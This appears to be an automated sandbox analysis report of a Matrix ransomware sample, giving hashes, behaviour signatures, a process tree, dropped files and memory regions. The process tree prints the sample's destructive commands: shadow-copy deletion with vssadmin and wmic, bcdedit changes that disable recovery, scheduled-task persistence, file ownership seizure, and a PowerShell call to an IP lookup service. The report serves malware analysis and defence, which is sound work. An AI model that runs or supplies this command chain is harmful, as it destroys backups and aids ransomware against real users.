Analysis

  • max time kernel
    150s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    27-12-2022 10:51

General

  • Target

    2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe

  • Size

    610KB

  • MD5

    1c73c307773fedfccd544a6b6b0b55b9

  • SHA1

    899ffd934e0b8a6df4b115c49df33fca524e2135

  • SHA256

    2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376

  • SHA512

    049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d

  • SSDEEP

    12288:mT9zGQU31phksyH0F8eHSE3BGAFTT/OAchocfoOG6FTvcDldnozRpXFqOO:mRyQUlGuLSE3BGAF//xlcfoO/IDr6FqO

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 42 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe
    "C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe" "C:\Users\Admin\AppData\Local\Temp\NWmKNSLG.exe"
      2⤵
        PID:1544
      • C:\Users\Admin\AppData\Local\Temp\NWmKNSLG.exe
        "C:\Users\Admin\AppData\Local\Temp\NWmKNSLG.exe" -n
        2⤵
        • Executes dropped EXE
        PID:1224
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\74ZNi9PS.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1944
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1044
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\6g1M8BV8.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1228
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\6g1M8BV8.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:1168
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:1356
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:288
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\J6QxuCTc.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1332
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\J6QxuCTc.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:860
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Yjtdu7kH.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:112
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Yjtdu7kH.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:900
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:524
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:1716
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\o7RPwe3S.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1552
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
                3⤵
                • Views/modifies file attributes
                PID:1860
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
                3⤵
                  PID:1084
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
                  3⤵
                  • Modifies file permissions
                  PID:1636
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c j63exjs4.exe -accepteula "ENUtxt.pdf" -nobanner
                  3⤵
                  • Loads dropped DLL
                  PID:1384
                  • C:\Users\Admin\AppData\Local\Temp\j63exjs4.exe
                    j63exjs4.exe -accepteula "ENUtxt.pdf" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:892
                    • C:\Users\Admin\AppData\Local\Temp\j63exjs464.exe
                      j63exjs4.exe -accepteula "ENUtxt.pdf" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Sets service image path in registry
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:968
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {D808374F-2D90-4DCF-9E77-BFBE7D08D061} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:1152
              • C:\Windows\SYSTEM32\cmd.exe
                C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Yjtdu7kH.bat"
                2⤵
                  PID:608
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin Delete Shadows /All /Quiet
                    3⤵
                    • Interacts with shadow copies
                    PID:1680
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic SHADOWCOPY DELETE
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1440
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled No
                    3⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1620
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    3⤵
                    • Modifies boot configuration data using bcdedit
                    PID:324
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Delete /TN DSHCA /F
                    3⤵
                      PID:2004
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:512

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\$Recycle.Bin\S-1-5-21-1214520366-621468234-4062160515-1000\desktop.ini

                  Filesize

                  1KB

                  MD5

                  d3d02af85299ecf39e617d41c4d06ae5

                  SHA1

                  dc60b3a1d41d1bcaa3e938c86ad59abbbef66a91

                  SHA256

                  000461487287cffbbd86136e52a9abe5c4bb4b10459a167e87dea8f3c5f948cf

                  SHA512

                  bd037c17096b6a47b52c4ef14eba85b5867216eb2b9dca6eaff4dd25d48e48e54958f3db90dc2d4e661ea787ce38c601601c4434c82b39b7a1756a7da0091ac8

                • C:\Users\Admin\AppData\Local\Temp\74ZNi9PS.txt

                  Filesize

                  14B

                  MD5

                  8eb51985066cb0782077f624013d47a2

                  SHA1

                  0549d07d51454e73b937946ba1887cacfce71835

                  SHA256

                  5537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44

                  SHA512

                  539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5

                • C:\Users\Admin\AppData\Local\Temp\NWmKNSLG.exe

                  Filesize

                  610KB

                  MD5

                  1c73c307773fedfccd544a6b6b0b55b9

                  SHA1

                  899ffd934e0b8a6df4b115c49df33fca524e2135

                  SHA256

                  2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376

                  SHA512

                  049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d

                • C:\Users\Admin\AppData\Local\Temp\NWmKNSLG.exe

                  Filesize

                  610KB

                  MD5

                  1c73c307773fedfccd544a6b6b0b55b9

                  SHA1

                  899ffd934e0b8a6df4b115c49df33fca524e2135

                  SHA256

                  2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376

                  SHA512

                  049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d

                • C:\Users\Admin\AppData\Local\Temp\j63exjs4.exe

                  Filesize

                  181KB

                  MD5

                  2f5b509929165fc13ceab9393c3b911d

                  SHA1

                  b016316132a6a277c5d8a4d7f3d6e2c769984052

                  SHA256

                  0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                  SHA512

                  c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                • C:\Users\Admin\AppData\Local\Temp\j63exjs4.exe

                  Filesize

                  181KB

                  MD5

                  2f5b509929165fc13ceab9393c3b911d

                  SHA1

                  b016316132a6a277c5d8a4d7f3d6e2c769984052

                  SHA256

                  0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                  SHA512

                  c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                • C:\Users\Admin\AppData\Local\Temp\j63exjs464.exe

                  Filesize

                  221KB

                  MD5

                  3026bc2448763d5a9862d864b97288ff

                  SHA1

                  7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                  SHA256

                  7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                  SHA512

                  d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                • C:\Users\Admin\AppData\Local\Temp\o7RPwe3S.bat

                  Filesize

                  246B

                  MD5

                  d898a5fb879f3bc4a6d244a56245441b

                  SHA1

                  00b3fff64087ce2ced13aa31596ccdb3ffddce4b

                  SHA256

                  d79aa42dd3a0fd639bbdf47d6ebd16b31977df2ade9acbb6687e8e73d1cb0a51

                  SHA512

                  591b287f12dfa1bac1b4bfd028ea337a35c9aac6f5baba28c5bf13605a8a7772358f6ffecea1785dc73629793af5361004ccd8e1c8c1f781a5a4e4f9511d7234

                • C:\Users\Admin\AppData\Roaming\J6QxuCTc.vbs

                  Filesize

                  260B

                  MD5

                  098ac14c686efd7e9fbabb9fa92b72d7

                  SHA1

                  ebb1ecb9e8215ed4e977487a75551898ffc0e09b

                  SHA256

                  83cd93eceabfe0d4136a8c903c4364422fdd56e20b00557521b4d82e040370e3

                  SHA512

                  17f75ac0d6884aa9f09135e32669fa2b4efd10ec0d0ee359a26a398518d06113a3686cfe0d078e6aab24d414c15bef993de2fbced94a239c8ac82a59e8ae444d

                • C:\Users\Admin\AppData\Roaming\Yjtdu7kH.bat

                  Filesize

                  265B

                  MD5

                  e9c48adfda6ab7238167d55cb8575c2e

                  SHA1

                  066eca2c8c3a00f02335b85a3e09b4228c34d6b9

                  SHA256

                  163e1c141833f6325f34e225562e78f3fe98ed7de15a0ee1e3f5b8c26eb49026

                  SHA512

                  7f5125b65519d7d6d3efa1e0aeb5d354f42b9305257012d48d959be6eefe17dcc173a562b1a5f877f3e1c724845266e5fdc7a40fbb3768302deca4a8248b81a4

                • \Users\Admin\AppData\Local\Temp\NWmKNSLG.exe

                  Filesize

                  610KB

                  MD5

                  1c73c307773fedfccd544a6b6b0b55b9

                  SHA1

                  899ffd934e0b8a6df4b115c49df33fca524e2135

                  SHA256

                  2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376

                  SHA512

                  049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d

                • \Users\Admin\AppData\Local\Temp\NWmKNSLG.exe

                  Filesize

                  610KB

                  MD5

                  1c73c307773fedfccd544a6b6b0b55b9

                  SHA1

                  899ffd934e0b8a6df4b115c49df33fca524e2135

                  SHA256

                  2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376

                  SHA512

                  049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d

                • \Users\Admin\AppData\Local\Temp\j63exjs4.exe

                  Filesize

                  181KB

                  MD5

                  2f5b509929165fc13ceab9393c3b911d

                  SHA1

                  b016316132a6a277c5d8a4d7f3d6e2c769984052

                  SHA256

                  0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                  SHA512

                  c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                • \Users\Admin\AppData\Local\Temp\j63exjs464.exe

                  Filesize

                  221KB

                  MD5

                  3026bc2448763d5a9862d864b97288ff

                  SHA1

                  7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                  SHA256

                  7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                  SHA512

                  d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                • memory/112-79-0x0000000000000000-mapping.dmp

                • memory/288-76-0x0000000000000000-mapping.dmp

                • memory/324-111-0x0000000000000000-mapping.dmp

                • memory/524-81-0x0000000000000000-mapping.dmp

                • memory/608-87-0x0000000000000000-mapping.dmp

                • memory/860-75-0x0000000000000000-mapping.dmp

                • memory/892-96-0x0000000000000000-mapping.dmp

                • memory/892-103-0x0000000000400000-0x0000000000477000-memory.dmp

                  Filesize

                  476KB

                • memory/900-80-0x0000000000000000-mapping.dmp

                • memory/968-100-0x0000000000000000-mapping.dmp

                • memory/1044-68-0x0000000072FB0000-0x000000007355B000-memory.dmp

                  Filesize

                  5.7MB

                • memory/1044-66-0x0000000000000000-mapping.dmp

                • memory/1044-69-0x0000000072FB0000-0x000000007355B000-memory.dmp

                  Filesize

                  5.7MB

                • memory/1084-91-0x0000000000000000-mapping.dmp

                • memory/1168-73-0x0000000000000000-mapping.dmp

                • memory/1224-86-0x0000000000400000-0x0000000000582000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1224-105-0x0000000000400000-0x0000000000582000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1224-59-0x0000000000000000-mapping.dmp

                • memory/1224-64-0x0000000000400000-0x0000000000582000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1228-71-0x0000000000000000-mapping.dmp

                • memory/1332-72-0x0000000000000000-mapping.dmp

                • memory/1356-74-0x0000000000000000-mapping.dmp

                • memory/1384-93-0x0000000000000000-mapping.dmp

                • memory/1384-106-0x0000000000400000-0x0000000000477000-memory.dmp

                  Filesize

                  476KB

                • memory/1384-102-0x0000000000400000-0x0000000000477000-memory.dmp

                  Filesize

                  476KB

                • memory/1440-109-0x0000000000000000-mapping.dmp

                • memory/1544-55-0x0000000000000000-mapping.dmp

                • memory/1552-88-0x0000000000000000-mapping.dmp

                • memory/1620-110-0x0000000000000000-mapping.dmp

                • memory/1636-92-0x0000000000000000-mapping.dmp

                • memory/1680-108-0x0000000000000000-mapping.dmp

                • memory/1716-82-0x0000000000000000-mapping.dmp

                • memory/1752-63-0x0000000002540000-0x00000000026C2000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1752-62-0x0000000000400000-0x0000000000582000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1752-83-0x0000000000400000-0x0000000000582000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1752-54-0x00000000759F1000-0x00000000759F3000-memory.dmp

                  Filesize

                  8KB

                • memory/1752-84-0x0000000002540000-0x00000000026C2000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1752-85-0x0000000002540000-0x00000000026C2000-memory.dmp

                  Filesize

                  1.5MB

                • memory/1860-90-0x0000000000000000-mapping.dmp

                • memory/1944-65-0x0000000000000000-mapping.dmp

                • memory/2004-112-0x0000000000000000-mapping.dmp